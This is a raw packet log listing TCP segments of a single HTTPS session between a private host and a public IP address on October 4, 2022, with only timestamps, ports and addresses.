                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.949635983 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.949651003 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.949681044 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.949687958 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.949815989 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.949965954 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.950025082 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.950067997 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.950166941 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.950195074 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.950315952 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.950323105 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.950370073 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.950479031 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.950586081 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.950685024 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.950691938 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.950709105 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.950721025 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.950910091 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.950918913 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.950927973 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.951059103 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.951143980 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.951232910 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.951246023 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.951298952 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.951304913 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.951431036 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.951499939 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.951513052 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.951592922 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.951598883 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.951613903 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.951715946 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.951771021 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.951932907 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.951941013 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.951980114 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.952080011 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.952091932 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.952097893 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.952105045 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.952229023 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.952244043 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.952255964 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.952286959 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.952393055 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.952400923 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.952543020 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.952557087 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.952574015 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.952580929 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.952755928 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.952853918 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.952861071 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.952934027 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.953083038 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.953125000 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.953150034 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.953232050 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.953239918 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.953336000 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.953358889 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.953493118 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.953501940 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.953583002 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.953700066 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.953707933 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.953852892 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.953860998 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.953922033 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.953984022 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.954144001 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.954195023 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.954201937 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.954276085 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.954349995 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.954436064 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.954443932 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.954536915 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.954643965 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.954777002 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.954788923 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.954888105 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.954895020 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.954924107 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.954972982 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.955073118 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.955116034 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.955210924 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.955218077 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.955326080 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.955328941 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.955491066 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.955499887 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.955506086 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.955578089 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.955642939 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.955648899 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.955868959 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.955871105 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.955879927 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.955985069 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.956060886 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.956248999 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.956319094 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.956326008 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.956427097 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.956434965 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.956629038 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.956804037 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.956868887 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.956877947 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.956948996 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.957062960 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.957076073 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.957127094 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.957134962 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.957237005 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.957243919 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.957354069 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.957355976 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.957364082 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.957638979 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.957674980 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.957722902 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.957730055 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.957822084 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.957823038 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.957839012 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.957974911 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.957983017 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.958072901 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.958159924 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.958165884 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.958295107 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.958301067 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.958374977 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.958470106 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.958477020 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.958542109 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.958739996 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.958741903 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.958859921 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.958868980 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.958935022 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.958945990 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.959125996 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.959162951 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.959170103 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.959261894 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.959269047 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.959372997 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.959589958 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.959613085 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.959620953 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.959851980 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.959861040 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.959918976 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.959925890 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.960056067 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.960118055 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.960124969 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.960165977 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.960172892 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.960275888 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.960283995 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.960333109 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.960438013 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.960494041 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.960501909 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.960627079 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.960706949 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.960720062 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.960800886 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.960872889 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.960880041 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.960963964 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.960978031 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.960998058 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.961004972 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.961112022 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.961150885 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.961205959 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.961340904 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.961342096 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.961349010 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.961471081 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.961476088 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.961487055 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.961592913 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.961600065 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.961705923 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.961710930 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.961808920 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.961860895 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.961934090 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.961940050 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.962050915 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.962160110 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.962167025 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.962240934 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.962415934 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.962424040 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.962433100 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.962518930 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.962526083 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.962627888 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.962636948 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.962810040 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.962857962 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.962866068 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.962975025 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.962982893 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.963140965 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.963149071 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.963188887 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.963258982 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.963267088 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.963380098 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.963387012 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.963546991 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.963553905 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.963654041 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.963663101 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.963818073 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.963995934 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.964003086 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.964193106 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.964257002 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.964271069 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.964309931 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.964317083 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.964468956 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.964482069 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.964487076 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.964581013 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.964590073 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.964634895 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.964642048 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.964760065 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.964787960 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.964797020 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.964951992 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.964977026 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.964986086 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.965121031 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.965246916 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.965255022 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.965293884 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.965346098 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.965353966 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.965445042 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.965475082 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.965634108 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.965641975 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.965667009 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.965733051 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.965847969 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.966037989 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.966101885 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.966110945 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.966201067 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.966278076 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.966291904 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.966368914 CEST49835443192.168.11.20172.67.68.80
